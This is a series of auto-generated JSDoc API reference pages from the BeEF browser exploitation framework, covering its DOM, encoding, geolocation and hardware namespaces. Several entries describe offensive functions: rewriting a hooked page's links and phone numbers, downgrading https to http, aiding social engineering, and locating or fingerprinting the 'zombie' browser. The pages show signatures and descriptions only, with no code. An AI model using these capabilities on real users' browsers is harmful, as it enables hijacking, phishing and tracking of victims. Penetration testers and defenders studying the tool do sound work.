<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>el</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"><p>the target element to be removed.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line44">line 44</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".removeStylesheets"><span class="type-signature">(static) </span>removeStylesheets<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
or, re-writing a document this is useful.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line214">line 214</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".rewriteLinks"><span class="type-signature">(static) </span>rewriteLinks<span class="signature">(url:, selector:)</span><span class="type-signature"> → {Number}</span></h4>
<div class="description">
<p>Rewrites all links matched by selector to url, also rebinds the click method to simply return true</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>url:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the url to be rewritten</p></td>
</tr>
<tr>
<td class="name"><code>selector:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the jquery selector statement to use, defaults to all a tags.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line266">line 266</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the amount of links found in the DOM and rewritten.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Number</span>
</dd>
</dl>
<h4 class="name" id=".rewriteLinksClickEvents"><span class="type-signature">(static) </span>rewriteLinksClickEvents<span class="signature">(url:, selector:)</span><span class="type-signature"> → {Number}</span></h4>
<div class="description">
<p>Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>url:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the url to be rewritten</p></td>
</tr>
<tr>
<td class="name"><code>selector:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the jquery selector statement to use, defaults to all a tags.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line283">line 283</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the amount of links found in the DOM and rewritten.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Number</span>
</dd>
</dl>
<h4 class="name" id=".rewriteLinksProtocol"><span class="type-signature">(static) </span>rewriteLinksProtocol<span class="signature">(old_protocol:, new_protocol:, selector:)</span><span class="type-signature"> → {Number}</span></h4>
<div class="description">
<p>Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>old_protocol:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the old link protocol to be rewritten</p></td>
</tr>
<tr>
<td class="name"><code>new_protocol:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the new link protocol to be written</p></td>
</tr>
<tr>
<td class="name"><code>selector:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the jquery selector statement to use, defaults to all a tags.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line300">line 300</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the amount of links found in the DOM and rewritten.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Number</span>
</dd>
</dl>
<h4 class="name" id=".rewriteTelLinks"><span class="type-signature">(static) </span>rewriteTelLinks<span class="signature">(new_number:, selector:)</span><span class="type-signature"> → {Number}</span></h4>
<div class="description">
<p>Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>new_number:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the new link telephone number to be written</p></td>
</tr>
<tr>
<td class="name"><code>selector:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the jquery selector statement to use, defaults to all a tags.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line325">line 325</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the amount of links found in the DOM and rewritten.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Number</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.encode.base64.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: base64</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: base64</h1>
<section>
<header>
<h2>base64</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line11">line 11</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".decode"><span class="type-signature">(static) </span>decode<span class="signature">(input)</span><span class="type-signature"> → {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>input</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line65">line 65</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".encode"><span class="type-signature">(static) </span>encode<span class="signature">(input)</span><span class="type-signature"> → {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>input</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".utf8_decode"><span class="type-signature">(static) </span>utf8_decode<span class="signature">(utftext)</span><span class="type-signature"> → {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>utftext</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line140">line 140</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
<h4 class="name" id=".utf8_encode"><span class="type-signature">(static) </span>utf8_encode<span class="signature">(string)</span><span class="type-signature"> → {string}</span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>string</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_base64.js.html">encode/base64.js</a>, <a href="encode_base64.js.html#line110">line 110</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">string</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.encode.json.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: json</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: json</h1>
<section>
<header>
<h2>json</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".quoteString"><span class="type-signature">(static) </span>quoteString<span class="signature">(string)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>string</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line110">line 110</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".stringify"><span class="type-signature">(static) </span>stringify<span class="signature">(o)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>o</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="encode_json.js.html">encode/json.js</a>, <a href="encode_json.js.html#line17">line 17</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.geolocation.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: geolocation</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: geolocation</h1>
<section>
<header>
<h2>geolocation</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides functionalities to use the geolocation API.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getGeolocation"><span class="type-signature">(static) </span>getGeolocation<span class="signature">(command_url, command_id)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Retrieve latitude/longitude using the geolocation API</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>command_url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>command_id</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line69">line 69</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getOpenStreetMapAddress"><span class="type-signature">(static) </span>getOpenStreetMapAddress<span class="signature">(command_url, command_id, latitude, longitude)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Given latitude/longitude retrieves exact street position of the zombie</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>command_url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>command_id</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>latitude</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>longitude</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line29">line 29</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isGeolocationEnabled"><span class="type-signature">(static) </span>isGeolocationEnabled<span class="signature">()</span><span class="type-signature"> → {boolean}</span></h4>
<div class="description">
<p>Check if browser supports the geolocation API</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line18">line 18</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.hardware.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: hardware</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: hardware</h1>
<section>
<header>
<h2>hardware</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getBatteryDetails"><span class="type-signature">(static) </span>getBatteryDetails<span class="signature">()</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Returns battery details</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line126">line 126</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".getCpuArch"><span class="type-signature">(static) </span>getCpuArch<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line18">line 18</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>CPU type</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getCpuCores"><span class="type-signature">(static) </span>getCpuCores<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns number of CPU cores</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line48">line 48</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getCpuDetails"><span class="type-signature">(static) </span>getCpuDetails<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns CPU details</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line64">line 64</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getGpuDetails"><span class="type-signature">(static) </span>getGpuDetails<span class="signature">()</span><span class="type-signature"> → {object}</span></h4>
<div class="description">
<p>Returns GPU details</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">object</span>
</dd>
</dl>
<h4 class="name" id=".getMemory"><span class="type-signature">(static) </span>getMemory<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns RAM (GiB)</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line110">line 110</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getScreenSize"><span class="type-signature">(static) </span>getScreenSize<span class="signature">()</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Returns zombie screen size and color depth.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line150">line 150</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".isEricsson"><span class="type-signature">(static) </span>isEricsson<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is Ericsson?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line227">line 227</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isGameConsole"><span class="type-signature">(static) </span>isGameConsole<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Returns true if the browser is on a game console</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line263">line 263</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isGoogle"><span class="type-signature">(static) </span>isGoogle<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is Google?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line243">line 243</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isHtc"><span class="type-signature">(static) </span>isHtc<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is HTC?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line219">line 219</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isLaptop"><span class="type-signature">(static) </span>isLaptop<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is a Laptop?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line190">line 190</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
